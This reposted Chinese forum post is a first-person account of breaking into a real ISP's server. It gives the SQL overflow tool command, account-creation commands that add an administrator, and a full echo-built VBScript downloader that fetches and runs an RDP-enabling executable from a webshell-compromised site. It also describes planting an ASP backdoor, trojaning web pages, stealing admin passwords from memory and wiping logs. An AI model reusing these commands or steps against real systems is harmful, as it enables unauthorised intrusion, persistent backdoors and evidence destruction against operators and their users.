[转载]一次简单的入侵
文章作者:菜豆丁近日对某ISP进行扫描,发现其下属服务器中有一台存在SQL溢出漏洞。习惯性的摸出sqlhello2.exe这个程序 cmd下敲入sqlhello2 61.*.*.* 1433 …….
得到C:\winnt\system32 ……………-_-!!简单了点
C:\winnt\system32\net user root 123 /add
C:\winnt\system32\net localgroup administrators root /add (好像没有人不喜欢这样)
扫端口得到3389关闭。测试上传文件 得到IPC$无法连接 这意味着copy是没法用了。换tftp连接不到我的地址(没钱的结果 ) ,用ftp脚本吧又没有能用的空间,是不是很烂?郁闷中Q了老大9xiao一下 得到一个单词" echo"。 面对这个词我觉得一下渺小了很多,nnd 不会就用百度啊。原来很早就有通过远程cmd编写echo脚本进行ftp 和web下载。这下有办法了。找到一个有webshell的网站,上传一个3389.exe到根目录下。 [url]www.xxxx.com/3389.exe[/url] 然后开始在cmd下一条条的敲入
echo Set xPost = createObject("Microsoft.XMLHTTP") >webdown.vbs
echo xPost.Open "GET","[url]http://www.xxxx.com/3389.exe[/url]";,0 >>webdown.vbs
echo xPost.Send() >>webdown.vbs
echo Set sGet = createObject("ADODB.Stream") >>webdown.vbs
echo sGet.Mode = 3 >>webdown.vbs
echo sGet.Type = 1 >>webdown.vbs
echo sGet.Open() >>webdown.vbs
echo sGet.Write(xPost.responseBody) >>webdown.vbs
echo sGet.SaveToFile "3389.exe",2 >>webdown.vbs
最后敲入 cscript webdown.vbs 这样一个开启3389端口的程序就安安稳稳的下载到了当前的目录里 还等什么 直接执行吧 C:\winnt\system32\3389.exe
然后C:\winnt\system32\下键入reboot 等待。。。。。。。。
1分钟后superscan扫一下 看到3389 幸福ing ~
进入主机后可以做几件有用的事情第一 建立一个隐藏的超级用户 第二 利用一个优秀的ASP木马通过iis服务管理器建立一个隐藏的后门 具体方法网上有很多介绍 在此就不重复了。
走之前要注意如果它的SQL服务已经停止了最好帮它运行起来,而且要记得擦PP,毕竟是ISP哦 惹不起。
以上是我的一次入侵过程 水平离前辈高手们差的很远 主要还是一个思路 请多多指教。
<补充一下 在其网页中挂马后 ,可以直接通过asp木马进行上传工作,如果遇到系统目录无法执行的情况,可以上传至D盘等然后在3389远程登陆后的界面下进行移动。然后我们上传个可以从进程中读取管理员密码的工具,网上有 不再介绍了。读出administrator 密码删除我们建立的帐号root 清理记录 尤其要注意是否有第三方记录插件>
页:
[1]